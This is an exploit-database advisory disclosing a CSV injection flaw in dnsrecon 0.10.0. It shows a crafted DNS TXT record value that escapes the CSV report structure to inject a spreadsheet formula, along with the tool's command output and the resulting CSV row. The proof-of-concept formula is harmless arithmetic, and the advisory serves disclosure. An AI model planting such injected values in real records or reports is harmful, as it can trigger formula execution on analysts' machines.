dnsrecon 0.10.0 CSV Injection

Credit: Dolev Farhi
Risk: Low
Local: No
Remote: Yes

# Exploit Title: dnsrecon 0.10.0 - CSV Injection # Author: Dolev Farhi # Date: 2021-01-07 # Vendor Homepage: https://github.com/darkoperator/dnsrecon/ # Version : 0.10.0 # Tested on: ParrotOS 4.10 dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String. A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: _spf.example.com "test',=1+1337,'z" user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n [*] Performing General Enumeration of Domain: _spf.example.com [-] DNSSEC is not configured for _spf.example.com [*] SOA ns-59.awsdns-07.com [-] Could not Resolve NS Records for _spf.example.com [-] Could not Resolve MX Records for _spf.example.com [*] TXT _spf.example.com test',=1+1337,'z [*] Enumerating SRV Records [+] 0 Records Found [*] Saving records to CSV file: ./file.csv {'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': ''} {'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"} This output will then be rewritten into a CSV with this structure: Type,Name,Address,Target,Port,String SOA,ns-59.awsdns-07.com, TXT,_spf.example.com,,,,'test',=1+1337,'z' The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464: Attribute Values All printable ASCII characters are permitted in the attribute value.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com


Back to Top